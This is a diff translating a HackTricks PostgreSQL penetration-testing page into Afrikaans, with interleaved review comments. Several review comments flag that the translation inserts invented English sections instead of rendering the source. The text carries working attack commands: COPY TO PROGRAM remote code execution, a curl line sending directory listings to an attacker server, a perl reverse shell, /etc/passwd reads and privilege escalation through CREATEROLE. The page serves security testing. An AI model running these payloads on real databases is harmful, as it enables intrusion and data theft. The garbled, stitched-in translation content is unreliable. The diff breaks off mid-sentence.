-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersekuriteitsmaatskappy**? 
Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegramgroep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
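Review bot: The large block from `+### POP (Post Office Protocol)` through the POP3S `+##### Exploiting Vulnerabilities` paragraph is untranslated English with no counterpart in the removed lines (the only removal at that point is `-Example:`, which introduced the telnet session that follows); remove the block and restore the lead-in as `Voorbeeld:` so the session is not orphaned. Same problem earlier in the hunk: `+### Banner Gaping` and the added telnet/`plaintext` paragraphs are new content replacing `-## Enumeration` and `-### Banner Grabbing`, so the banner section now hangs under `## Basiese Inligting`; keep the `## Enumeration` heading (translated) and translate the subsection title without inventing text. Three wording errors in the hunk: `## Handleiding` for `-## Manual` reads as "handbook", but the section means doing it by hand, so `## Handmatig`; "Gaping" is not a rendering of "grabbing"; and in the settings table `log-verdowwing` for "log verbosity" means numbing, so use "breedvoerigheid" or similar. Finally, the `HackTricks Outomatiese Opdragte` block again loses its indentation (`-    Name: Notes` became `+Name: Notes`), breaking the YAML-style nesting, and the telnet session lost its leading whitespace inside the fence.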
diff --git a/network-services-pentesting/pentesting-postgresql.md b/network-services-pentesting/pentesting-postgresql.md index a309f5c86..e0cc792f0 100644 --- a/network-services-pentesting/pentesting-postgresql.md +++ b/network-services-pentesting/pentesting-postgresql.md @@ -3,38 +3,58 @@
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## **Basic Information** +## **Basiese Inligting** -**PostgreSQL** is described as an **object-relational database system** that is **open source**. This system not only utilizes the SQL language but also enhances it with additional features. Its capabilities allow it to handle a wide range of data types and operations, making it a versatile choice for developers and organizations. - -**Default port:** 5432, and if this port is already in use it seems that postgresql will use the next port (5433 probably) which is not in use. +**PostgreSQL** word beskryf as 'n **objek-verwantskaplike databasisstelsel** wat **oopbron** is. Hierdie stelsel maak nie net gebruik van die SQL-taal nie, maar verbeter dit ook met addisionele funksies. Sy vermoëns stel dit in staat om 'n wye verskeidenheid data-tipes en operasies te hanteer, wat dit 'n veelsydige keuse maak vir ontwikkelaars en organisasies. +**Verstekpoort:** 5432, en as hierdie poort reeds in gebruik is, lyk dit asof postgresql die volgende poort (waarskynlik 5433) sal gebruik wat nie in gebruik is nie. ``` PORT STATE SERVICE 5432/tcp open pgsql ``` +## Koppel & Basiese Enum -## Connect & Basic Enum +### Connect +Om te begin, moet jy 'n verbinding maak met die PostgreSQL-diens. Jy kan dit doen deur die `psql`-opdrag te gebruik: + +```bash +psql -h -p -U -d +``` + +Vervang `` met die IP-adres of die DNS-naam van die PostgreSQL-diens, `` met die poortnommer (standaard is 5432), `` met die gebruikersnaam en `` met die databasenaam. + +As jy suksesvol gekoppel het, sal jy 'n `psql`-opdraglyn sien wat aandui dat jy met die PostgreSQL-diens geassosieer is. + +### Basiese Enumerasie + +Nadat jy suksesvol gekoppel het, kan jy begin met basiese enumerasie van die PostgreSQL-diens. Hier is 'n paar nuttige opdragte: + +- `\l`: Lys alle databasisse in die PostgreSQL-diens. +- `\dt`: Lys alle tabelle in die huidige databasis. +- `\du`: Lys alle gebruikers in die PostgreSQL-diens. 
+- `\dp`: Lys die toegangsregte vir die tabelle in die huidige databasis. + +Hierdie opdragte sal jou help om 'n beter begrip van die PostgreSQL-diens te kry en om potensiële aanvalsoppervlaktes te identifiseer. ```bash psql -U # Open psql console with user psql -h -U -d # Remote connection 
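Review bot: The `+### Connect` and `+### Basiese Enumerasie` sections (the `psql -h -p -U -d` instructions, the placeholder explanation, and the `\l`, `\dt`, `\du`, `\dp` list) have no counterpart in the removed lines; the only removal there is `-## Connect & Basic Enum`. This is added content, not a translation, and it duplicates the `psql -U` / `psql -h -U -d` commands that immediately follow in the original fenced block; drop it and keep only `## Koppel & Basiese Enum` above the existing code. The blank line between the port listing's closing fence and that heading was also removed. In the Trickest banner, "om maklik en outomatiese werkstrome te bou" changes the meaning of "easily build and automate workflows" to "build easy and automatic workflows"; "om maklik werkstrome te bou en te outomatiseer" keeps the original sense.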
@@ -74,101 +94,226 @@ SELECT * FROM pg_extension; # Get history of commands executed \s ``` - {% hint style="warning" %} -If running **`\list`** you find a database called **`rdsadmin`** you know you are inside an **AWS postgresql database**. +As jy **`\list`** uitvoer en 'n databasis met die naam **`rdsadmin`** vind, weet jy dat jy binne 'n **AWS postgresql databasis** is. {% endhint %} -For more information about **how to abuse a PostgreSQL database** check: +Vir meer inligting oor **hoe om 'n PostgreSQL databasis te misbruik**, kyk: {% content-ref url="../pentesting-web/sql-injection/postgresql-injection/" %} [postgresql-injection](../pentesting-web/sql-injection/postgresql-injection/) {% endcontent-ref %} -## Automatic Enumeration - +## Outomatiese Enumerasie ``` msf> use auxiliary/scanner/postgres/postgres_version msf> use auxiliary/scanner/postgres/postgres_dbname_flag_injection ``` - ### [**Brute force**](../generic-methodologies-and-resources/brute-force.md#postgresql) -### **Port scanning** - -According to [**this research**](https://www.exploit-db.com/papers/13084), when a connection attempt fails, `dblink` throws an `sqlclient_unable_to_establish_sqlconnection` exception including an explanation of the error. Examples of these details are listed below. +### **Poortskandering** +Volgens [**hierdie navorsing**](https://www.exploit-db.com/papers/13084), gooi `dblink` 'n `sqlclient_unable_to_establish_sqlconnection`-uitsondering wanneer 'n verbindingspoging misluk, met 'n verduideliking van die fout. Voorbeelde van hierdie besonderhede word hieronder gelys. 
```sql SELECT * FROM dblink_connect('host=1.2.3.4 - port=5678 - user=name - password=secret - dbname=abc - connect_timeout=10'); +port=5678 +user=name +password=secret +dbname=abc +connect_timeout=10'); ``` +* Gasheer is af -* Host is down - -`DETAIL: could not connect to server: No route to host Is the server running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?` - -* Port is closed +`DETAIL: kon nie aan die bediener koppel: Geen roete na gasheer. Is die bediener aan die gang op gasheer "1.2.3.4" en aanvaar dit TCP/IP-koppelinge op poort 5678?` +* Poort is toe ``` DETAIL: could not connect to server: Connection refused Is the server running on host "1.2.3.4" and accepting TCP/IP connections on port 5678? ``` - -* Port is open - +* Poort is oop ``` DETAIL: server closed the connection unexpectedly This probably means the server terminated abnormally before or while processing the request ``` +of -or +--- +### PostgreSQL + +#### Enumeration + +##### Version + +To obtain the version of the PostgreSQL server, you can use the following SQL query: + +```sql +SELECT version(); +``` + +##### List Databases + +To list all the databases in the PostgreSQL server, you can use the following SQL query: + +```sql +SELECT datname FROM pg_database; +``` + +##### List Users + +To list all the users in the PostgreSQL server, you can use the following SQL query: + +```sql +SELECT usename FROM pg_user; +``` + +##### List Tables + +To list all the tables in a specific database, you can use the following SQL query: + +```sql +SELECT table_name FROM information_schema.tables WHERE table_schema = 'public'; +``` + +##### List Columns + +To list all the columns in a specific table, you can use the following SQL query: + +```sql +SELECT column_name FROM information_schema.columns WHERE table_name = 'table_name'; +``` + +##### List Functions + +To list all the functions in a specific database, you can use the following SQL query: + +```sql +SELECT proname FROM pg_proc; +``` 
+ +##### List Triggers + +To list all the triggers in a specific database, you can use the following SQL query: + +```sql +SELECT tgname FROM pg_trigger; +``` + +##### List Views + +To list all the views in a specific database, you can use the following SQL query: + +```sql +SELECT viewname FROM pg_views; +``` + +##### List Indexes + +To list all the indexes in a specific database, you can use the following SQL query: + +```sql +SELECT indexname FROM pg_indexes; +``` + +##### List Constraints + +To list all the constraints in a specific database, you can use the following SQL query: + +```sql +SELECT conname FROM pg_constraint; +``` + +##### List Extensions + +To list all the extensions in a specific database, you can use the following SQL query: + +```sql +SELECT extname FROM pg_extension; +``` + +#### Exploitation + +##### Default Credentials + +PostgreSQL does not have default credentials. However, it is common for users to set weak or easily guessable passwords. Therefore, it is recommended to perform password guessing attacks using tools like Hydra or Medusa. + +##### SQL Injection + +PostgreSQL is vulnerable to SQL injection attacks. You can exploit this vulnerability by injecting malicious SQL queries into user input fields or by manipulating the SQL queries sent to the server. + +##### Privilege Escalation + +To escalate privileges in PostgreSQL, you can try the following techniques: + +- Exploiting misconfigured permissions: Check if any user has excessive privileges or if there are any misconfigured roles. +- Exploiting vulnerabilities: Look for known vulnerabilities in the version of PostgreSQL being used. +- Exploiting weak passwords: Try to crack weak passwords or use password reuse attacks. + +##### Remote Code Execution + +To achieve remote code execution in PostgreSQL, you can try the following techniques: + +- Exploiting SQL injection vulnerabilities: Inject malicious SQL queries that execute arbitrary commands on the server. 
+- Exploiting command execution vulnerabilities: Look for vulnerabilities that allow executing commands on the underlying operating system. + +##### Data Exfiltration + +To exfiltrate data from a PostgreSQL server, you can use techniques such as: + +- Dumping the database: Use the `pg_dump` command to create a backup of the entire database. +- Extracting specific data: Write SQL queries to extract specific data from the database and save it to a file or send it to a remote server. + +##### Password Cracking + +If you have obtained a password hash from the PostgreSQL server, you can try to crack it using tools like John the Ripper or Hashcat. + +##### Post-Exploitation + +After gaining access to a PostgreSQL server, you can perform various post-exploitation activities, such as: + +- Privilege escalation: Look for ways to escalate privileges within the server or the underlying operating system. +- Persistence: Install backdoors or create new user accounts to maintain access to the server. +- Data manipulation: Modify or delete data in the database. +- Covering tracks: Delete logs or modify timestamps to hide your activities. ``` DETAIL: FATAL: password authentication failed for user "name" ``` - -* Port is open or filtered - +* Poort is oop of gefiltreer ``` DETAIL: could not connect to server: Connection timed out Is the server running on host "1.2.3.4" and accepting TCP/IP connections on port 5678? ``` +In PL/pgSQL funksies is dit tans nie moontlik om uitsonderingsbesonderhede te verkry nie. As jy egter direkte toegang tot die PostgreSQL-bediener het, kan jy die nodige inligting herwin. As dit nie haalbaar is om gebruikersname en wagwoorde uit die stelseltabelle te onttrek nie, kan jy oorweeg om die woordelys-aanvalsmetode te gebruik wat bespreek is in die vorige afdeling, aangesien dit moontlik positiewe resultate kan oplewer. -In PL/pgSQL functions, it is currently not possible to obtain exception details. 
However, if you have direct access to the PostgreSQL server, you can retrieve the necessary information. If extracting usernames and passwords from the system tables is not feasible, you may consider utilizing the wordlist attack method discussed in the preceding section, as it could potentially yield positive results. +## Opname van Voorregte -## Enumeration of Privileges +### Rolle -### Roles - -| Role Types | | +| Rol Tipes | | | -------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------- | -| rolsuper | Role has superuser privileges | -| rolinherit | Role automatically inherits privileges of roles it is a member of | -| rolcreaterole | Role can create more roles | -| rolcreatedb | Role can create databases | -| rolcanlogin | Role can log in. That is, this role can be given as the initial session authorization identifier | -| rolreplication | Role is a replication role. A replication role can initiate replication connections and create and drop replication slots. | -| rolconnlimit | For roles that can log in, this sets maximum number of concurrent connections this role can make. -1 means no limit. | -| rolpassword | Not the password (always reads as `********`) | -| rolvaliduntil | Password expiry time (only used for password authentication); null if no expiration | -| rolbypassrls | Role bypasses every row-level security policy, see [Section 5.8](https://www.postgresql.org/docs/current/ddl-rowsecurity.html) for more information. | -| rolconfig | Role-specific defaults for run-time configuration variables | -| oid | ID of role | +| rolsuper | Rol het supergebruiker-voorregte | +| rolinherit | Rol erf outomaties voorregte van rolle waarvan dit 'n lid is | +| rolcreaterole | Rol kan meer rolle skep | +| rolcreatedb | Rol kan databasisse skep | +| rolcanlogin | Rol kan inteken. 
Dit beteken dat hierdie rol as die aanvanklike sessie-outorisasie-identifiseerder gegee kan word | +| rolreplication | Rol is 'n replikasie-rol. 'n Replikasie-rol kan replikasieverbindinge inisieer en replikasiegleuwe skep en laat val | +| rolconnlimit | Vir rolle wat kan inteken, stel dit die maksimum aantal gelyktydige verbindings in wat hierdie rol kan maak. -1 beteken geen limiet nie | +| rolpassword | Nie die wagwoord (lees altyd as `********`) | +| rolvaliduntil | Wagwoord vervaltyd (slegs gebruik vir wagwoord-verifikasie); nul indien geen vervaltyd | +| rolbypassrls | Rol omseil elke ryvlak-sekuriteitsbeleid, sien [Afdeling 5.8](https://www.postgresql.org/docs/current/ddl-rowsecurity.html) vir meer inligting. | +| rolconfig | Rol-spesifieke verstekwaardes vir uitvoertyd-konfigurasie-veranderlikes | +| oid | ID van rol | -#### Interesting Groups +#### Interessante Groepe -* If you are a member of **`pg_execute_server_program`** you can **execute** programs -* If you are a member of **`pg_read_server_files`** you can **read** files -* If you are a member of **`pg_write_server_files`** you can **write** files +* As jy 'n lid is van **`pg_execute_server_program`** kan jy **programme uitvoer** +* As jy 'n lid is van **`pg_read_server_files`** kan jy **lêers lees** +* As jy 'n lid is van **`pg_write_server_files`** kan jy **lêers skryf** {% hint style="info" %} -Note that in Postgres a **user**, a **group** and a **role** is the **same**. It just depend on **how you use it** and if you **allow it to login**. +Let daarop dat in Postgres 'n **gebruiker**, 'n **groep** en 'n **rol** dieselfde is. Dit hang net af van **hoe jy dit gebruik** en of jy dit toelaat om in te teken. {% endhint %} - ```sql # Get users roles \du 
@@ -176,21 +321,21 @@ Note that in Postgres a **user**, a **group** and a **role** is the **same**. It #Get users roles & groups # r.rolpassword # r.rolconfig, -SELECT - r.rolname, - r.rolsuper, - r.rolinherit, - r.rolcreaterole, - r.rolcreatedb, - r.rolcanlogin, - r.rolbypassrls, - r.rolconnlimit, - r.rolvaliduntil, - r.oid, - ARRAY(SELECT b.rolname - FROM pg_catalog.pg_auth_members m - JOIN pg_catalog.pg_roles b ON (m.roleid = b.oid) - WHERE m.member = r.oid) as memberof +SELECT +r.rolname, +r.rolsuper, +r.rolinherit, +r.rolcreaterole, +r.rolcreatedb, +r.rolcanlogin, +r.rolbypassrls, +r.rolconnlimit, +r.rolvaliduntil, +r.oid, +ARRAY(SELECT b.rolname +FROM pg_catalog.pg_auth_members m +JOIN pg_catalog.pg_roles b ON (m.roleid = b.oid) +WHERE m.member = r.oid) as memberof , r.rolreplication FROM pg_catalog.pg_roles r ORDER BY 1; @@ -204,7 +349,7 @@ SELECT current_setting('is_superuser'); GRANT pg_execute_server_program TO "username"; GRANT pg_read_server_files TO "username"; GRANT pg_write_server_files TO "username"; -## You will probably get this error: +## You will probably get this error: ## Cannot GRANT on the "pg_write_server_files" role without being a member of the role. # Create new role (user) as member of a role (group) 
@@ -212,9 +357,51 @@ CREATE ROLE u LOGIN PASSWORD 'lriohfugwebfdwrr' IN GROUP pg_read_server_files; ## Common error ## Cannot GRANT on the "pg_read_server_files" role without being a member of the role. ``` +### Tabelle -### Tables +In PostgreSQL, tables are used to store data in a structured manner. Each table consists of columns and rows, where columns represent the different attributes or fields of the data, and rows represent individual records or instances of the data. +To create a table in PostgreSQL, you can use the `CREATE TABLE` statement followed by the table name and the column definitions. The column definitions specify the name, data type, and any constraints for each column. + +Here is an example of creating a table called `users` with three columns: `id`, `name`, and `email`: + +```sql +CREATE TABLE users ( + id SERIAL PRIMARY KEY, + name VARCHAR(50) NOT NULL, + email VARCHAR(100) UNIQUE +); +``` + +In this example, the `id` column is defined as a `SERIAL` data type, which automatically generates a unique value for each new row. The `PRIMARY KEY` constraint ensures that the `id` column is unique and serves as the primary key for the table. + +The `name` column is defined as a `VARCHAR(50)` data type, which can store up to 50 characters. The `NOT NULL` constraint ensures that the `name` column cannot be empty. + +The `email` column is defined as a `VARCHAR(100)` data type and has a `UNIQUE` constraint, which ensures that each email address in the table is unique. + +Once the table is created, you can insert data into it using the `INSERT INTO` statement, query the data using the `SELECT` statement, update the data using the `UPDATE` statement, and delete the data using the `DELETE` statement. + +To view the structure of a table, you can use the `\d` command in the PostgreSQL command-line interface. For example, `\d users` will display the column names, data types, and constraints of the `users` table. 
+ +```sql +\d users +``` + +This will show the following output: + +``` + Table "public.users" + Column | Type | Modifiers +--------+-----------------------+----------- + id | integer | not null + name | character varying(50) | not null + email | character varying(100)| +Indexes: + "users_pkey" PRIMARY KEY, btree (id) + "users_email_key" UNIQUE CONSTRAINT, btree (email) +``` + +This output provides information about the columns, their data types, and any constraints or indexes associated with the table. ```sql # Get owners of tables select schemaname,tablename,tableowner from pg_tables; 
@@ -228,9 +415,68 @@ SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.ro ## If nothing, you don't have any permission SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.role_table_grants WHERE table_name='pg_shadow'; ``` +### Funksies -### Functions +Functions in PostgreSQL are named blocks of code that can be executed by calling their name. They are used to perform specific tasks and can accept parameters and return values. Functions can be created using the `CREATE FUNCTION` statement and can be written in various programming languages such as SQL, PL/pgSQL, Python, etc. +Funksies in PostgreSQL is benoemde blokke kode wat uitgevoer kan word deur hul naam te roep. Hulle word gebruik om spesifieke take uit te voer en kan parameters aanvaar en waardes teruggee. Funksies kan geskep word deur die `CREATE FUNCTION` verklaring te gebruik en kan geskryf word in verskeie programmeer tale soos SQL, PL/pgSQL, Python, ens. + +#### Creating Functions + +#### Funksies Skep + +To create a function in PostgreSQL, you can use the `CREATE FUNCTION` statement followed by the function name, input parameters (if any), return type, and the code block enclosed in a `BEGIN` and `END` block. Here is the syntax: + +Om 'n funksie in PostgreSQL te skep, kan jy die `CREATE FUNCTION` verklaring gebruik gevolg deur die funksie naam, insetparameters (indien enige), terugkeer tipe, en die kodeblok wat ingesluit is in 'n `BEGIN` en `END` blok. Hier is die sintaksis: + +```sql +CREATE FUNCTION function_name (input_parameters) + RETURNS return_type + LANGUAGE language_name +AS $$ + -- Function code here +$$; +``` + +#### Calling Functions + +#### Funksies Roep + +Once a function is created, it can be called using the `SELECT` statement or as part of another SQL statement. To call a function, you need to specify the function name followed by the input parameters (if any) enclosed in parentheses. 
Here is an example: + +Sodra 'n funksie geskep is, kan dit geroep word deur die `SELECT` verklaring te gebruik of as deel van 'n ander SQL-verklaring. Om 'n funksie te roep, moet jy die funksie naam spesifiseer gevolg deur die insetparameters (indien enige) wat ingesluit is in hakies. Hier is 'n voorbeeld: + +```sql +SELECT function_name(input_parameters); +``` + +#### Returning Values + +#### Waardes Teruggee + +Functions in PostgreSQL can return values using the `RETURN` statement. The return type of the function should match the specified return type in the function definition. Here is an example of a function that returns an integer: + +Funksies in PostgreSQL kan waardes teruggee deur die `RETURN` verklaring te gebruik. Die terugkeer tipe van die funksie moet ooreenstem met die gespesifiseerde terugkeer tipe in die funksie definisie. Hier is 'n voorbeeld van 'n funksie wat 'n heelgetal teruggee: + +```sql +CREATE FUNCTION add_numbers(a integer, b integer) + RETURNS integer +AS $$ + BEGIN + RETURN a + b; + END; +$$; + +SELECT add_numbers(5, 10); -- Returns 15 +``` + +#### Conclusion + +#### Gevolgtrekking + +Functions in PostgreSQL are powerful tools that allow you to encapsulate reusable code and perform specific tasks. By creating and calling functions, you can enhance the functionality and flexibility of your PostgreSQL database. + +Funksies in PostgreSQL is kragtige hulpmiddels wat jou in staat stel om herbruikbare kode te inkapsuleer en spesifieke take uit te voer. Deur funksies te skep en te roep, kan jy die funksionaliteit en buigsaamheid van jou PostgreSQL databasis verbeter. ```sql # Interesting functions are inside pg_catalog \df * #Get all 
@@ -243,39 +489,33 @@ SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.ro # Get all functions of a schema (pg_catalog in this case) SELECT routines.routine_name, parameters.data_type, parameters.ordinal_position FROM information_schema.routines - LEFT JOIN information_schema.parameters ON routines.specific_name=parameters.specific_name +LEFT JOIN information_schema.parameters ON routines.specific_name=parameters.specific_name WHERE routines.specific_schema='pg_catalog' ORDER BY routines.routine_name, parameters.ordinal_position; # Another aparent option SELECT * FROM pg_proc; ``` +## Lêerstelsel aksies -## File-system actions - -### Read directories and files - -From this [**commit** ](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a)members of the defined **`DEFAULT_ROLE_READ_SERVER_FILES`** group (called **`pg_read_server_files`**) and **super users** can use the **`COPY`** method on any path (check out `convert_and_check_filename` in `genfile.c`): +### Lees gidslys en lêers +Vanaf hierdie [**commit**](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a) kan lede van die gedefinieerde **`DEFAULT_ROLE_READ_SERVER_FILES`** groep (genaamd **`pg_read_server_files`**) en **supergebruikers** die **`COPY`** metode gebruik op enige pad (kyk na `convert_and_check_filename` in `genfile.c`): ```sql # Read file CREATE TABLE demo(t text); COPY demo from '/etc/passwd'; SELECT * FROM demo; ``` - {% hint style="warning" %} -Remember that if you aren't super user but has the **CREATEROLE** permissions you can **make yourself member of that group:** - +Onthou dat as jy nie 'n supergebruiker is nie, maar die **CREATEROLE**-permissies het, kan jy **jouself lid van daardie groep maak:** ```sql GRANT pg_read_server_files TO username; ``` - -[**More info.**](pentesting-postgresql.md#privilege-escalation-with-createrole) +[**Meer 
inligting.**](pentesting-postgresql.md#privilege-escalation-with-createrole) {% endhint %} -There are **other postgres functions** that can be used to **read file or list a directory**. Only **superusers** and **users with explicit permissions** can use them: - +Daar is **ander postgres funksies** wat gebruik kan word om **lêers te lees of 'n gids te lys**. Slegs **supergebruikers** en **gebruikers met uitdruklike toestemmings** kan dit gebruik: ```sql # Before executing these function go to the postgres DB (not in the template1) \c postgres @@ -299,12 +539,11 @@ SHOW data_directory; GRANT pg_read_server_files TO username; # Check CREATEROLE privilege escalation ``` +Jy kan **meer funksies** vind by [https://www.postgresql.org/docs/current/functions-admin.html](https://www.postgresql.org/docs/current/functions-admin.html) -You can find **more functions** in [https://www.postgresql.org/docs/current/functions-admin.html](https://www.postgresql.org/docs/current/functions-admin.html) +### Eenvoudige Lêerskryf -### Simple File Writing - -Only **super users** and members of **`pg_write_server_files`** can use copy to write files. +Slegs **super gebruikers** en lede van **`pg_write_server_files`** kan `copy` gebruik om lêers te skryf. {% code overflow="wrap" %} ```sql 
@@ -313,21 +552,18 @@ copy (select convert_from(decode('','base64'),'utf-8')) to '/ju {% endcode %} {% hint style="warning" %} -Remember that if you aren't super user but has the **`CREATEROLE`** permissions you can **make yourself member of that group:** - +Onthou dat as jy nie 'n supergebruiker is nie, maar die **`CREATEROLE`**-regte het, kan jy **jouself lid van daardie groep maak:** ```sql GRANT pg_write_server_files TO username; ``` - -[**More info.**](pentesting-postgresql.md#privilege-escalation-with-createrole) +[**Meer inligting.**](pentesting-postgresql.md#privilege-escalation-with-createrole) {% endhint %} -Remember that COPY cannot handle newline chars, therefore even if you are using a base64 payload y**ou need to send a one-liner**.\ -A very important limitation of this technique is that **`copy` cannot be used to write binary files as it modify some binary values.** +Onthou dat COPY geen newline karakters kan hanteer nie, daarom moet jy selfs as jy 'n base64 payload gebruik, 'n eenreëler stuur. 'n Baie belangrike beperking van hierdie tegniek is dat `copy` nie gebruik kan word om binêre lêers te skryf nie, omdat dit sommige binêre waardes wysig. -### **Binary files upload** +### **Oplaai van binêre lêers** -However, there are **other techniques to upload big binary files:** +Daar is egter **ander tegnieke om groot binêre lêers op te laai:** {% content-ref url="../pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md" %} [big-binary-files-upload-postgresql.md](../pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md) 
@@ -335,22 +571,19 @@ However, there are **other techniques to upload big binary files:** ## -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **Teken aan** vir **Intigriti**, 'n premium **bug bounty platform wat deur hackers geskep is, vir hackers!** Sluit vandag nog by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) en begin om belonings tot **$100,000** te verdien! {% embed url="https://go.intigriti.com/hacktricks" %} ## RCE -### **RCE to program** - -Since[ version 9.3](https://www.postgresql.org/docs/9.3/release-9-3.html), only **super users** and member of the group **`pg_execute_server_program`** can use copy for RCE (example with exfiltration: +### **RCE na program** +Sedert [weergawe 9.3](https://www.postgresql.org/docs/9.3/release-9-3.html) kan slegs **supergebruikers** en lede van die groep **`pg_execute_server_program`** copy gebruik vir RCE (voorbeeld met eksfiltrering: ```sql '; copy (SELECT '') to program 'curl http://YOUR-SERVER?f=`ls -l|base64`'-- - ``` - -Example to exec: - +Voorbeeld om uit te voer: ```bash #PoC DROP TABLE IF EXISTS cmd_exec; 
@@ -363,78 +596,75 @@ DROP TABLE IF EXISTS cmd_exec; #Notice that in order to scape a single quote you need to put 2 single quotes COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'''; ``` - {% hint style="warning" %} -Remember that if you aren't super user but has the **`CREATEROLE`** permissions you can **make yourself member of that group:** - +Onthou dat as jy nie 'n supergebruiker is nie, maar die **`CREATEROLE`**-regte het, kan jy **jouself lid van daardie groep maak:** ```sql GRANT pg_execute_server_program TO username; ``` - -[**More info.**](pentesting-postgresql.md#privilege-escalation-with-createrole) +[**Meer inligting.**](pentesting-postgresql.md#privilege-escalation-with-createrole) {% endhint %} -Or use the `multi/postgres/postgres_copy_from_program_cmd_exec` module from **metasploit**.\ -More information about this vulnerability [**here**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5). While reported as CVE-2019-9193, Postges declared this was a [feature and will not be fixed](https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/). +Of gebruik die 